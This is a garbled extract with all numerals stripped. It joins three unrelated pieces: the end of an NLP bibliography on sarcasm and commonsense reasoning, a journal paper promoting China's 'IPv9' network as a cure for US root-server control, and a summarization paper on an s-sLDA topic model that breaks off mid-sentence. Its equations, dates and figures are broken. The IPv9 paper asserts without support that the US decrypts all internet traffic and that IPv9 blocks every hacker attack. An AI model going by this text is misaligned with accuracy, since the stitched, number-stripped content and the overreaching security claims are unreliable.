. object detection with discrimina- tively trained part based models. ieee transactions on pattern analysis and machine intelligence, ( ). elena filatova. . irony and sarcasm: corpus gen- eration and analysis using crowdsourcing. in proc. of the international conference on language resources and evaluation (lrec). matt gerber, andrew s gordon, and kenji sagae. . open-domain commonsense reasoning using discourse relations from a corpus of weblog stories. in proc. of the naacl hlt first international workshop on formalisms and methodology for learn- ing by reading. roberto gonzález-ibánez, smaranda muresan, and nina wacholder. . identifying sarcasm in twitter: a closer look. in proc. of the annual meeting of the as- sociation computational linguistics (acl). associa- tion for computational linguistics. andrew s gordon, cosmin adrian bejan, and kenji sagae. . commonsense causal reasoning using millions of personal stories. in proc. of the national conference on artificial intelligence (aaai). andrew s gordon, zornitsa kozareva, and melissa roemmele. . semeval- task : choice of plausible alternatives: an evaluation of commonsense causal reasoning. in proc. of the sixth international workshop on semantic evaluation. amit goyal, ellen riloff, and hal daumé iii. . au- tomatically producing plot unit representations for nar- rative text. in proc. of the conference on empirical methods for natural language processing (emnlp). jerry r hobbs, mark stickel, paul martin, and douglas edwards. . interpretation as abduction. in proc. of the annual meeting of the association computa- tional linguistics (acl). jihen karoui, farah benamara, v?ronique moriceau, nathalie aussenac-gilles, and lamia hadrich bel- guith. . towards a contextual pragmatic model to detect irony in tweets. in proc. of the annual meeting of the association computational linguistics (acl). yoon kim. . convolutional neural networks for sentence classification. in proc. of the conference on empirical methods for natural language processing (emnlp). igor labutov and hod lipson. . humor as circuits in semantic networks. in proc. of the annual meeting of the association computational linguistics (acl). wendy g. lehnert. . plot units and narrative sum- marization. cognitive science, ( ): – . douglas b lenat. . cyc: a large-scale investment in knowledge infrastructure. communications of the acm, ( ): – . hugo liu and push singh. . conceptnet?a practi- cal commonsense reasoning tool-kit. bt technology journal, ( ): – . peter lobue and alexander yates. . types of common-sense knowledge needed for recognizing tex- tual entailment. in proc. of the annual meeting of the association computational linguistics (acl). stephanie lukin and marilyn walker. . really? well. apparently bootstrapping improves the perfor- mance of sarcasm and nastiness classifiers for online dialogue. in proc. of the workshop on language anal- ysis in social media. inderjeet mani. . computational modeling of nar- rative. synthesis lectures on human language tech- nologies. morgan & claypool publishers. christopher d. manning, mihai surdeanu, john bauer, jenny finkel, steven j. bethard, and david mcclosky. . the stanford corenlp natural language pro- cessing toolkit. in proc. of the annual meeting of the association computational linguistics (acl). andré ft martins, noah a smith, and eric p xing. . polyhedral outer approximations with applica- tion to natural language parsing. in proc. of the inter- national conference on machine learning (icml). j. mccarthy. . circumscription a form of non- monotonic reasoning. artificial intelligence, ( , ). tomas mikolov, ilya sutskever, kai chen, gregory s corrado, and jeffrey dean. . distributed rep- resentations of words and phrases and their composi- tionality. in the conference on advances in neural information processing systems (nips). tim o’keefe, silvia pareti, james r curran, irena ko- prinska, and matthew honnibal. . a sequence labelling approach to quote attribution. in proc. of the conference on empirical methods for natural lan- guage processing (emnlp). bo pang and lillian lee. . opinion mining and sentiment analysis. foundations and trends in infor- mation retrieval, ( - ): – . v. punyakanok, d. roth, and w. yih. . the impor- tance of syntactic parsing and inference in semantic role labeling. computational linguistics, ( ). nathan d. ratliff, j. andrew bagnell, and martin zinke- vich. . (approximate) subgradient methods for structured prediction. in proc. of the international conference on artificial intelligence and statistics (aistats). raymond reiter. . a logic for default reasoning. artificial intelligence, ( ): – . antonio reyes, paolo rosso, and tony veale. . a multidimensional approach for detecting irony in twit- ter. language resources and evaluation, ( ): – . matthew richardson, christopher j. c. burges, and erin renshaw. . mctest: a challenge dataset for the open-domain machine comprehension of text. in proc. of the conference on empirical methods for natural language processing (emnlp). ellen riloff, ashequl qadir, prafulla surve, lalindra de silva, nathan gilbert, and ruihong huang. . sarcasm as contrast between a positive sentiment and negative situation. in proc. of the conference on empirical methods for natural language processing (emnlp). richard socher, danqi chen, christopher d manning, and andrew ng. . reasoning with neural ten- sor networks for knowledge base completion. in the conference on advances in neural information pro- cessing systems (nips). xu sun, takuya matsuzaki, , daisuke okanohara, and junichi tsujii. . latent variable perceptron al- gorithm for structured classication. in proc. of the in- ternational joint conference on artificial intelligence (ijcai). niket tandon, gerard de melo, and gerhard weikum. . deriving a web-scale common sense fact database. in proc. of the national conference on arti- ficial intelligence (aaai). joseph tepperman, david r traum, and shrikanth narayanan. . ” yeah right”: sarcasm recognition for spoken dialogue systems. in proc. of interspeech. byron c. wallace, do kook choe, laura kertz, and eu- gene charniak. . humans require context to in- fer ironic intent (so computers probably do, too). in proc. of the annual meeting of the association com- putational linguistics (acl). byron c. wallace, do kook choe, and eugene charniak. . sparse, contextually informed models for irony detection: exploiting user communities, entities and sentiment. in proc. of the annual meeting of the asso- ciation computational linguistics (acl). hai wang and mohit bansal kevin gimpel david mcallester. . machine comprehension with syn- tax, frames, and semantics. in proc. of the annual meeting of the association computational linguistics (acl). international journal of advanced network, monitoring and controls volume , no. , from network security to network autonomous wang yubian* department of railway transportation control belarusian state university of transport , kirova street,gomel, republic of belarus *is the communication author. e-mail: alika_wang@mail.ru yuri shebzukhov department of the international relations belarusian state university of transport republic of belarus , kirovastreet, gomel, republic of belarus e-mail: oms@bsut.by abstract—in the th century, the emergence of the internet has completely changed the work and life of human beings around the world. today, people are increasingly inseparable from network. the internet has been integrated with the global industry, agriculture, education, science,technologyand national defense. the current internet was originated in the united states. the internet systems based on ipv and ipv ,they are controlled by the united states completely. computers connected to the internet are subject to data retention and backup in the united states. data security is greatly threatened. in addition, due to limitations and loopholes in the design of the internet, the internet is subject to many different types of attacks. internet research which based on security autonomy has received the attention of sovereign countries in the world. this paper mainly introduces the future internet system developed by chinese researchers based on the current research on internet servers,which is a new generation network system,the research and application of this system will have a profound impact on the world's internet. keywords-network security; root server; network autonomous; future internet people can’t live without the internet;internet has become a necessity in daily life.the share of the network economy has accounted for % of the global gdp. the importance of the network has become more and more prominent, so the basic work about the network is even more important. now the internet has two biggest problems. one is the cyber sovereignty, which is about the network’s belongs. it is obviously that the united stateshold the internet. how to adhere to cyber sovereignty is still a challenge. another problem is that many countries hope the operators will speed up and reduce the cost at the same time. it need the operators to reduce the bandwidth cost of access to the internet by smes, and how to reduce the bandwidth fee for accessing the internet is a problem. this two major problems are now more difficult to solve, and why? we need specific analysis of specific issues and tell everyone what solutions we have. i. cyberspace first of all, there must be a definition of cyberspace. this is very important. how do we adhere to the sovereignty of cyberspace?currently,there is noaccurate definition in the media, and we think it should be definedproperly. cyberspace is a virtual space that contains three basic elements.in the space,virtual and real are contained, and dominated by virtual. in this virtual cyberspace, it is not these infrastructures that are in the most important leadership position, nor our application environment, but the full root system. this must be clear, if this is not clear, many explanations will go wrong. the core embodiment of cyberspace sovereignty is the standard protocol for data communication technology. at present, it includes the ipv , ipv and future network/ipv network data communication standards and protocols of the existing equipment running in the world, and the formed network space address naming rights, distribution rights, resolution rights and route addressing operation management rights. the core resources of cyberspace include: the parent root server, the primary server, the root name servers, the ip address of the address and domain name resolution system, asset equipment and operation management rights. therefore, it can be said who owns the core assets of cyberspace, who masters the sovereignty of cyberspace. doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , ii. internet server the working principle of the current public network is not thoroughly understood. actually, this is very important. this determines how to adhere the cyberspace sovereignty. this is determined the basic principles. any time we access the network, including any computer on the internet, phone internet access and mobile internet access. firstly, we must access the root server. the root system consists of the parent root server and the primary root server (the publishing host). this hidden publishing host only root domain name servers ( root domain name servers are equal rights) that can be accessed to maintain this hidden publishing host. the root domain name servers read the primary root server, then read the parent root server and obtain the data, then read by the mirror server, and spread to the entire network. the root server is mainly used to manage the home directory of the internet. all parent, root, and sub- servers of ipv are managed by icann, an internet domain name and number assignment authority authorized by the us government are responsible for the management of global internet domain name root servers, domain name systems, and ip addresses. there are only root name servers in the world. ten of them are in the united states, two in europe, in the united kingdom and sweden, and one in asia in japan. these logical root servers direct web browsers such as firefox or internet explorer and email programs to control internet communications. because the root server has more than internet domain name suffixes (such as .edu, .com, etc.) approved by the us government and all national domain names (such as .us in the us, .cn in china, etc.). since the establishment of the internet, the world has become very dependent on the united states. the united states has controlled the entire internet by controlling the root server, posing a potentially major threat to cybersecurity in other countries. the so- called dependence, embodied in the working mechanism of the internet, lies in the problem of "root server". in theory, any form of standard domain name to be analyzed, in accordance with the technical process, must be completed through the work of the global "hierarchical" domain name resolution system. the first layer of the "hierarchical" domain name resolution system is the root server, which is responsible for managing domain name information of countries all over the world. below the root server is a top-level domain name server, that is, a database of relevant national domain name management institutions, such as cnnic in china, and then at the next level. the domain name database and the isp's cache server. a domain name must first be parsed by the root database before it can be redirected to the top- level domain name server. iii. internet access and security any network access in the world should firstvisit the united states, and now some people say that many visits are not going abroad, and indeed some businesses do not feel abroad for the time being. in fact, the mirror root serversare working and cache serversare working. the internet set up mirror servers in some countries without root servers, but these servers are completely controlled by the united states. commonly used urls can be parsed locally, and data can cache locally to prevent network congestion. however, the root of the internet can back up the entire network. traffic can still go out, although most of the data traffic business is domestic. this is why the united states monitors the world through the internet, and because of economic reasons, the data traffic to the root system is two-way billing. since the widespread use of the internet, the internet has been constantly challenged, and various types of attacks from all over the world have continued. typical server failures are as follows. a. failure in in july , a new general list of internet address assignments was automatically passed between these domain name servers, but this list is actually blank. this human error led to the most severe local service disruption on the internet, resulting in inaccessible web pages within a few days and the inability to send emails. b. attack in on october , , at : pm et, the servers were hit by the most serious and largest cyber-attack in history. the attack was a ddos attack (distributed denial of service). with the help of client/server technology, this attack combines multiple computers as attack platforms and launches attacks on one or more targets, thus doubling the power of denial of service attacks. data that is to times more than the conventional number rushed to these servers and caused of them to not function properly. seven units lost their ability to handle network communications, and the other two were immediately behind. this attack may not be affected by the average user. if you only analyze from the "consequences" of this incident, some people may think that "not all root name servers will be attacked, so you can rest assured", or international journal of advanced network, monitoring and controls volume , no. , "the root name server has no problem with the root name server", it is still too early. but they are not clear about the root cause. not all root name servers are affected; the attack ends in a short period of time; the attack is relatively simple, so it is easy to take appropriate measures. since there is no particularly effective solution for ddos attacks, imagine that if the attack time is extended, the attack is a bit more complicated, or there is one more server, the global internet will have quite a few web browsing and e-mail services. this will be completely interrupted. c. dns failure at the beginning of beginning around : on january , , there was a problem with dns resolution of a large number of internet domain names around the world. some well-known websites and all non-existent domain names were incorrectly pointed to . . . (fremont, california, united states, hurricane electric). china's dns domain name resolution system has experienced a wide range of access failures, which have been confirmed by several dns domain name resolution service providers, including dnspod. the accident affected the whole country. nearly two-thirds of the websites had access faults in different areas and network environments to varying degrees. the framework of the entire network information security can be divided into three levels.  information security of various services at the network application layer, killing viruses, anti- trojans, hardening firewalls and proactively defending against network attacks are the main tasks of network security departments in different countries. andmany information security is mainly supported by encryption technology. as long as they are targeted by capable hackers, it is only a matter of time before information encryption and decryption are made.  the network core equipment and terminal equipment, including the cpu core chip and the os operating system/database are all from the united states. the information of this equipment is transparent to the united states and the nsa, and there is no security possibility.  the problem of network information security caused by the lack of network sovereignty is a more global problem. each bit under each communication ip address is monitored by the us internet root system. all data is analyzed by the us national security bureau for big data analysis, and then stored and archived. the encrypted information is decrypted according to the specific situation! in order to change the situation, china’s cyberspace is in a serious strategic passive situation, in order to defend the network sovereignty and build a new generation of sovereign networks with domestically controllable security, some countries have carried out research and development of some network system structures. iv. the new generation of the internet in , ministry of information industry of china established the “decimal network standard working group”. in , ministry of information industry of chinadefined ipv as a new generation internet to distinguish ipv officially. in order to break through the future network basic theory and support the next generation internet experiment and build the future network test facilities, including: original network equipment system, resource monitoring management system, covering cloud computing services, internet of things applications, spatial information network simulation, network information security open network test systems such as high-performance integrated circuit verification and quantum communication networks. in december , the core parts of the future international standards published by iso/iec, such as "name and addressing" and "safety", are dominated by chinese experts and have core intellectual property rights. the future network has clear and unique definitions. major countries such as the united states, russia, canada, and south korea have voted in favor. on june , , ministry of information industry of china published the relevant industry standards for ipv implementation in the country: sj/t , sj/t , sj/t , sj/t . this marks the -years hard workingreceive rewards. the chinese government has adopted the mature ipv main root/mother root/ root name server system named from nz. the core backbone router and user router product series have begun to build autonomous, intellectual property rights, and computer communication networks that are independent of the us internet but are internet compatible. international journal of advanced network, monitoring and controls volume , no. , the main features of the future network/ipv are as following. a. increasing the geographical and national concepts get increase it is distributed and managed by countries, and it is close to the analysis, and the flow of information is reasonable. end-to-end communication can be realized according to requirements, and it is not necessary to be controlled by the united states like ipv and ipv . it is low-cost, high-efficiency, and it saves network expenses andachieves environmental protection. b. realizing the unification of electronic tag and barcodes the huge address capacity of ipv realizes the uniqueness of address allocation. the combination of ip address, digital domain name and electronic tag and bar code coding technology will extends the network to every corner of sensor technology. ipv enables bar codes to have the same internet access function as electronic tags, and can track and control the circulation of goods and equipment from the production plant. the bar code can also be identified when the rfid electronic tag wireless channel is disturbed. china's unique barcode and rfid electronic label hybrid technology will greatly reduce the management costs of the global manufacturing and logistics industries. c. realize multi-code integration ipv not only makes the domain name and ip address unified, but also can be combined with the global unique identifier of the person or thing, so that the phone number, mobile phone number, domain name and ip address can be combined into one number; the same code for electronic tags and barcodes is a solution and application platform for the future information society and the realization of “ubiquitous” networks. d. real-name internet access ipv network can realize real-name internet access, and can also protect customers' privacy rights. it can open up a certain number of anonymous addresses for blog use, but it does not allow anonymous address users to enter banks, government, social welfare, commodity circulation, etc. e. ipv has address encryption different from the current means of encrypting applications, ipv innovatively designed address encryption to extend security protection to the network layer, greatly improving the country's information security. whether it is ipv currently in use or the next-generation internet protocol ipv proposed by foreign countries is unmatched. the ipv communication protocol packet structure is designed reasonably, and the packet item function is clear. the ipv protocol is better than the ipv protocol in terms of address space, service quality, and security. when the application support and network device support are mature, the ipv protocol can replace the ipv protocol and become a communication protocol for network interconnection. the address representation of the data packets of the ipv protocol is different from that of the ipv or ipv protocol. therefore, the data packet header of the ipv protocol will not be recognized by the ipv or ipv system and will not be directly transmitted in these systems. therefore, using ipv protocol communication, its data messages will not be directly transmitted to other protocols' networks, thus controlling the data transmission range and improving the security of communication to a certain extent. f. currently, all hacker attacks and all online eavesdropping software are developed based on ipv ipv routers and v nics will not release these attack packets from hackers and hackers, and will build a great wall for hacking and online intelligence. v. summary the new generation internet based on ipv , the main root/mother root server system, the domain name resolution system, the backbone router/user router are all independently developed and produced by china, and are compatible with ipv /ipv . they support all existing applications of ipv , and the underlying network itself adds ipv /ipv . there is no security mechanism, the address itself can be encrypted, and the communication can be verified first. at the same time, the new generation network address is extremely rich, and it also includes information such as geographic location/industry category. in the future, the network/ipv starts with the address ^ power, and the number of addresses for managing digital assets can reach ^ power, future network. /ipv can not only meet the global -year communication address demand, but also an important tool for digital asset management. it is the core foundation for the future digital world/digital global and the future community of cyberspace destiny. international journal of advanced network, monitoring and controls volume , no. , references [ ] xie jianping etc.method of using whole digital code to assign address for computer [p]. us: , . . [ ] s. deering, r. hinden, network working group. internet protocol, version (ipv )-specification, rfc- , . . [ ] m. crawford. network working group. transmission of ipv packets over ethernet networks.rfc- , . . [ ] j. onions, network working group. a historical perspective on the usage of ip version . rfc . . . [ ] v. cerf, network working group. a view from the st century, rfc . . . [ ] information technology-future network- problem statement and requirement-part : naming and addressing, iso/iec dtr - , , . [ ] radio frequency identification tag information query service network architecture technical specification. sj/t - , . . transactions of the association for computational linguistics, ( ) – . action editor: noah smith. submitted / ; published / . c© association for computational linguistics. a novel feature-based bayesian model for query focused multi-document summarization jiwei li school of computer science carnegie mellon university bdlijiwei@gmail.com sujian li laboratory of computational linguistics peking university lisujian@pku.edu.cn abstract supervised learning methods and lda based topic model have been successfully applied in the field of multi-document summarization. in this paper, we propose a novel supervised approach that can in- corporate rich sentence features into bayesian topic models in a principled way, thus taking advantages of both topic model and feature based supervised learn- ing methods. experimental results on duc , tac and tac demonstrate the effective- ness of our approach. introduction query-focused multi-document summarization (nenkova et al., ; wan et al., ; ouyang et al., ) can facilitate users to grasp the main idea of documents. in query-focused summarization, a specific topic description, such as a query, which expresses the most important topic information is proposed before the document collection, and a summary would be generated according to the given topic. supervised models have been widely used in sum- marization (li, et al., , shen et al., , ouyang et al., ). supervised models usually re- gard summarization as a classification or regression problem and use various sentence features to build a classifier based on labeled negative or positive sam- ples. however, existing supervised approaches sel- dom exploit the intrinsic structure among sentences. this disadvantage usually gives rise to serious prob- lems such as unbalance and low recall in summaries. recently, lda-based (blei et al., ) bayesian topic models have widely been applied in multi- document summarization in that bayesian ap- proaches can offer clear and rigorous probabilis- tic interpretations for summaries(daume and marcu, ; haghighi and vanderwende, ; jin et al., ; mason and charniak, ; delort and alfon- seca, ). exiting bayesian approaches label sen- tences or words with topics and sentences which are closely related with query or can highly generalize documents are selected into summaries. however, lda topic model suffers from the intrinsic disad- vantages that it only uses word frequency for topic modeling and can not use useful text features such as position, word order etc (zhu and xing, ). for example, the first sentence in a document may be more important for summary since it is more likely to give a global generalization about the document. it is hard for lda model to consider such informa- tion, making useful information lost. it naturally comes to our minds that we can im- prove summarization performance by making full use of both useful text features and the latent seman- tic structures from by lda topic model. one related work is from celikyilmaz and hakkani-tur ( ). they built a hierarchical topic model called hybh- sum based on lda for topic discovery and assumed this model can produce appropriate scores for sen- tence evaluation. then the scores are used for tun- ing the weights of various features that helpful for summary generation. their work made a good step of combining topic model with feature based super- vised learning. however, what their approach con- fuses us is that whether a topic model only based on word frequency is good enough to generate an appropriate sentence score for regression. actually, how to incorporate features into lda topic model has been a open problem. supervised topic models such as slda(blei and macauliffe ) give us some inspiration. in slda, each document is asso- ciated with a labeled feature and slda can integrate such feature into lda for topic modeling in a prin- cipled way. with reference to the work of supervised lda models, in this paper, we propose a novel sentence feature based bayesian model s-slda for multi- document summarization. our approach can natu- rally combine feature based supervised methods and topic models. the most important and challeng- ing problem in our model is the tuning of feature weights. to solve this problem, we transform the problem of finding optimum feature weights into an optimization algorithm and learn these weights in a supervised way. a set of experiments are con- ducted based on the benchmark data of duc , tac and tac , and experimental results show the effectiveness of our model. the rest of the paper is organized as follows. sec- tion describes some background and related works. section describes our details of s-slda model. section demonstrates details of our approaches, including learning, inference and summary gener- ation. section provides experiments results and section concludes the paper. related work a variety of approaches have been proposed for query-focused multi-document summarizations such as unsupervised (semi-supervised) approaches, supervised approaches, and bayesian approaches. unsupervised (semi-supervised) approaches such as lexrank (erkan and radex, ), manifold (wan et al., ) treat summarization as a graph- based ranking problem. the relatedness between the query and each sentence is achieved by impos- ing querys influence on each sentence along with the propagation of graph. most supervised ap- proaches regard summarization task as a sentence level two class classification problem. supervised machine learning methods such as support vector machine(svm) (li, et al., ), maximum en- tropy (osborne, ) , conditional random field (shen et al., ) and regression models (ouyang et al., ) have been adopted to leverage the rich sentence features for summarization. recently, bayesian topic models have shown their power in summarization for its clear probabilistic interpretation. daume and marcu ( ) proposed bayesum model for sentence extraction based on query expansion concept in information retrieval. haghighi and vanderwende ( ) proposed topic- sum and hiersum which use a lda-like topic model and assign each sentence a distribution over back- ground topic, doc-specific topic and content topics. celikyilmaz and hakkani-tur ( ) made a good step in combining topic model with supervised fea- ture based regression for sentence scoring in sum- marization. in their model, the score of training sentences are firstly got through a novel hierarchi- cal topic model. then a featured based support vec- tor regression (svr) is used for sentence score pre- diction. the problem of celikyilmaz and hakkani- turs model is that topic model and feature based re- gression are two separate processes and the score of training sentences may be biased because their topic model only consider word frequency and fail to con- sider other important features. supervised feature based topic models have been proposed in recent years to incorporate different kinds of features into lda model. blei ( ) proposed slda for doc- ument response pairs and daniel et al. ( ) pro- posed labeled lda by defining a one to one corre- spondence between latent topic and user tags. zhu and xing ( ) proposed conditional topic random field (ctrf) which addresses feature and indepen- dent limitation in lda. model description . lda and slda the hierarchical bayesian lda (blei et al., ) models the probability of a corpus on hidden topics as shown in figure (a). let k be the number of topics , m be the number of documents in the cor- pus and v be vocabulary size. the topic distribution of each document θm is drawn from a prior dirichlet distribution dir(α), and each document word wmn is sampled from a topic-word distribution φz spec- ified by a drawn from the topic-document distribu- tion θm. β is a k×m dimensional matrix and each βk is a distribution over the v terms. the generat- ing procedure of lda is illustrated in figure . θm is a mixture proportion over topics of document m and zmn is a k dimensional variable that presents the topic assignment distribution of different words. supervised lda (slda) (blei and mcauliffe ) is a document feature based model and intro- figure : graphical models for (a) lda model and (b) slda model. . draw a document proportion vector θm|α ∼ dir(α) . for each word in m (a)draw topic assignment zmn|θ ∼ multi(θzmn ) (b)draw word wmn|zmn,β ∼ multi(βzmn ) figure : generation process for lda duces a response variable to each document for topic discovering, as shown in figure (b). in the gener- ative procedure of slda, the document pairwise la- bel is draw from y|−→zm,η,δ ∼ p(y|−→zm,η,δ ), where−→zm = n ∑n n= zm,n. . problem formulation here we firstly give a standard formulation of the task. let k be the number of topics, v be the vo- cabulary size and m be the number of documents. each document dm is represented with a collection of sentence dm = {ss}s=nms= where nm denotes the number of sentences in mth document. each sentence is represented with a collection of words {wmsn}n=nmsn= where nms denotes the number of words in current sentence. −−→ yms denotes the feature vector of current sentence and we assume that these features are independent. . s-slda zms is the hidden variable indicating the topic of current sentence. in s-slda, we make an assump- tion that words in the same sentence are generated from the same topic which was proposed by gruber ( ). zmsn denotes the topic assignment of cur- rent word. according to our assumption, zmsn = figure : graph model for s-slda model . draw a document proportion vector θm|α ∼ dir(α) . for each sentence in m (a)draw topic assignment zms|θ ∼ multi(θzmn ) (b)draw feature vector −−→ yms|zms,η ∼ p( −−→ yms|zms,η) (c)for each word wmsn in current sentence draw wmsn|zms,β ∼ multi(βzms ) figure : generation process for s-slda zms for any n ∈ [ ,nms]. the generative approach of s-slda is shown in figure and figure . we can see that the generative process involves not only the words within current sentence, but also a series of sentence features. the mixture weights over fea- tures in s-slda are defined with a generalized lin- ear model (glm). p( −−→ yms|zms,η) = exp(ztmsη) −−→ yms ∑ zms exp(ztmsη) −−→ yms ( ) here we assume that each sentence has t features and −−→ yms is a t × dimensional vector. η is a k × t weight matrix of each feature upon topics, which largely controls the feature generation proce- dure. unlike s-lda where η is a latent variable esti- mated from the maximum likelihood estimation al- gorithm, in s-slda the value of η is trained through a supervised algorithm which will be illustrated in detail in section . . posterior inference and estimation given a document and labels for each sentence, the posterior distribution of the latent variables is: p(θ,z :n|w :n,y,α,β :k,η) = ∏ m p(θm|α) ∏ s[p(zms|θm)p( −−→ yms|zms,η) ∏ n p(wmsn|zmsn,βzmsn ]∫ dθp(θm|α) ∑ z ∏ s[p(zms|θm)p( −−→ yms|zms,η) ∏ n p(wmsn|βzmsn )] ( ) eqn. ( ) cannot be efficiently computed. by applying the jensens inequality, we obtain a lower bound of the log likelihood of document p(θ,z :n|w :n, −−→ yms,α,β :k,η) ≥ l, where l = ∑ ms e[logp(zms|θ)] + ∑ ms e[logp( −−→ yms|zms,η)]+ ∑ m e[logp (θ|α)] + ∑ msn e[logp(wmsn|zms,β)] + h(q) ( ) where h(q) = −e[logq] and it is the entropy of variational distribution q is defined as q(θ,z|γ,φ) = ∏ mk q(θm|γ) ∏ sn q(zmsn|φms) ( ) here γ a k-dimensional dirichlet parameter vector and multinomial parameters. the first, third and forth terms of eqn. ( ) are identical to the corre- sponding terms for unsupervised lda (blei et al., ). the second term is the expectation of log probability of features given the latent topic assign- ments. e[logp( −−→ yms|zms,η)] = e(zms) tη −−→ yms − log ∑ zms exp(ztmsη −−→ yms) ( ) where e(zms)t is a × k dimensional vector [φmsk] k=k k= . the bayes estimation for s-slda model can be got via a variational em algorithm. in em procedure, the lower bound is firstly minimized with respect to γ and φ, and then minimized with α and β by fixing γ and φ. e-step: the updating of dirichlet parameter γ is identical to that of unsupervised lda, and does not involve feature vector −−→ yms. γnewm ← α + ∑ s∈m φs ( ) φnewsk ∝ exp{e[logθm|γ] + nms∑ n= e[log(wmsn|β :k)]+ t∑ t= ηktyst} = exp[Ψ(γmk) − Ψ( k∑ k= γmk) + t∑ t= ηktyst] ( ) where Ψ(·) denotes the log Γ function. ms denotes the document that current sentence comes from and yst denotes the tth feature of sentence s. m-step: the m-step for updating β is the same as the pro- cedure in unsupervised lda, where the probability of a word generated from a topic is proportional to the number of times this word assigned to the topic. βnewkw = m∑ m= nm∑ s= nms∑ n= (wmsn = w)φ k ms ( ) our approach . learning in this subsection, we describe how we learn the fea- ture weight η in a supervised way. the learning pro- cess of η is a supervised algorithm combined with variational inference of s-slda. given a topic de- scription q and a collection of training sentences s from related documents, human assessors assign a score v(v = − ,− , , , ) to each sentence in s. the score is an integer between − (the least desired summary sentences) and + (the most desired sum- mary sentences), and score denotes neutral atti- tude. ov = {ov ,ov , ...,vvk}(v = − ,− , , , ) is the set containing sentences with score v. let φqk denote the probability that query is generated from topic k. since query does not belong to any docu- ment, we use the following strategy to leverage φqk φqk = ∏ w∈q βkw· m m∑ m= exp[Ψ(γmk)−Ψ( k∑ k= γmk)] ( ) in equ.( ), ∏ w∈q βkw denotes the probability that all terms in query are generated from topic k and m ∑m m= exp[Ψ(γmk)−Ψ( ∑k k= γmk)] can be seen as the average probability that all documents in the corpus are talking about topic k. eqn. ( ) is based on the assumption that query topic is relevant to the main topic discussed by the document corpus. this is a reasonable assumption and most previous lda summarization models are based on similar as- sumptions. next, we define φov,k for sentence set ov, which can be interpreted as the probability that all sen- tences in collection ov are generated from topic k. φov,k = |ov| ∑ s∈ov φsk,k ∈ [ ,k],v ∈ [− , ] ( ) |ov| denotes the number of sentences in set ov. in- spired by the idea that desired summary sentences would be more semantically related with the query, we transform problem of finding optimum η to the following optimization problem: minηl(η) = v= ∑ v=− v ·kl(ov||q); t∑ t= ηkt = ( ) we select multiple queries and their related sentences for training where kl(ov||q) is the kullback-leibler diver- gence between the topic and sentence set ov as shown in eqn.( ). kl(ov||q) = k∑ k= φovklog φovk φqk ( ) in eqn. ( ), we can see that o , which contain de- sirable sentences, would be given the largest penalty for its kl divergence from query. the case is just opposite for undesired set. our idea is to incorporate the minimization pro- cess of eqn.( ) into variational inference process of s-slda model. here we perform gradient based optimization method to minimize eqn.( ). firstly, we derive the gradient of l(η) with respect to η. ∂l(η) ηxy = v= ∑ v=− v · ∂kl(qv||q) ∂ηxy ( ) ∂kl(qv||q) ∂ηxy = k∑ k= |qv| ( + log ∑ s∈qv |qv| ) ∑ s∈qv ∂φsk ∂ηxy − k∑ k= |qv| ∑ s∈qv ∂qsk ηxy − k∑ k= qv ∑ s∈qvφsk φqk ∂φsk ∂ηxy ( ) for simplification, we regard β and γ as constant during updating process of η, so ∂φqk ∂ηxy = . we can further get first derivative for each labeled sentence. ∂φsk ηxy ∝    ysyexp[Ψ(γmsi) − Ψ( k∑ k= γmsk) + t∑ t= ηktysy] × ∏ w∈s βkw if k = x if k = x ( ) . feature space lots of features have been proven to be useful for summarization (louis et al., ). here we dis- cuss several types of features which are adopted in s-slda model. the feature values are either binary or normalized to the interval [ , ]. the following features are used in s-slda: cosine similarity with query: cosine similarity is based on the tf-idf value of terms. this is reasonable because the influence of γ and β have been embodied in φ during each iteration. local inner-document degree order: local inner document degree order is a binary feature which indicates whether inner-document degree (idd) of sentence s is the largest among its neighbors. idd means the edge number between s and other sen- tences in the same document. document specific word: if a sentence contains document specific word, otherwise. average unigram probability (nenkova and van- derwende, ; celikyilmaz and hakkani-tur ): as for sentence s, p(s) = ∑ w∈s |s|pd(w), where pd(w) is the observed unigram probability in document collection. in addition, we also use the commonly used fea- tures including sentence position, paragraph po- sition, sentence length and sentence bigram fre- quency. e-step initialize φ sk := /k for all i and s. initialize γmi := αmi + n)m/k for all i. initialize ηkt = for all k and t. while not convergence for m = : m update γt+ m according to eqn.( ) for s = : nm for k = : k update φt+ sk according to eqn.( ) normalize the sum of φt+ sk to . minimize l(η) according to eqn.( )-( ). m-step: update β according to eqn.( ) figure : learning process of η in s-slda . sentence selection strategy next we explain our sentence selection strategy. ac- cording to our intuition that the desired summary should have a small kl divergence with query, we propose a function to score a set of sentences sum. we use a decreasing logistic function ζ(x) = /( + ex) to refine the score to the range of ( , ). score(sum) = ζ(kl(sum||q)) ( ) let sum? denote the optimum update summary. we can get sum? by maximizing the scoring function. sum? = arg max sum∈s&&words(sum)≤l score(sum) ( ) . learning: given labeled set ov, learn the feature weight vector η using algorithm in figure . . given new data set and η, use algorithm in section . for inference. (the only difference between this step and step ( ) is that in this step we do not need minimize l(η). . select sentences for summarization from algo- rithm in figure . figure : summarization generation by s-slda. a greedy algorithm is applied by adding sentence one by one to obtain sum?. we use g to denote the sentence set containing selected sentences. the algorithm first initializes g to Φ and x to su. dur- ing each iteration, we select one sentence from x which maximize score(sm ∪g). to avoid topic re- dundancy in the summary, we also revise the mmr strategy (goldstein et al., ; ouyang et al., ) in the process of sentence selection. for each sm, we compute the semantic similarity between sm and each sentence st in set y in eqn.( ). cos−sem(sm,st) = ∑ k φsmkφstk√∑ k φ smk √∑ k φ stk ( ) we need to assure that the value of semantic similar- ity between two sentences is less than thsem. the whole procedure for summarization using s-slda model is illustrated in figure . thsem is set to . in the experiments. experiments . experiments set-up the query-focused multi-document summarization task defined in duc (document understanding conference) and tac (text analysis conference) evaluations requires generating a concise and well organized summary for a collection of related news documents according to a given query which de- scribes the users information need. the query usually consists of a title and one or more narra- tive/question sentences. the system-generated sum- maries for duc and tac are respectively limited to http://duc.nist.gov/. http://www.nist.gov/tac/. words and words. our experiment data is composed of duc , tac and tac data which have , and collections respec- tively. in our experiments, duc data is used as training data and tac ( - ) data is used as the test data. stop-words in both documents and queries are removed using a stop-word list of words, and the remaining words are stemmed by porter stem- mer . as for the automatic evaluation of summa- rization, rouge (recall-oriented understudy for gisting evaluation) measures, including rouge- , rouge- , and rouge-su and their corre- sponding % confidence intervals, are used to eval- uate the performance of the summaries. in order to obtain a more comprehensive measure of summary quality, we also conduct manual evaluation on tac data with reference to (haghighi and vanderwende, ; celikyilmaz and hakkani-tur, ; delort and alfonseca, ). . comparison with other bayesian models in this subsection, we compare our model with the following bayesian baselines: kl-sum: it is developed by haghighi and vanderwende (lin et al., ) by using a kl- divergence based 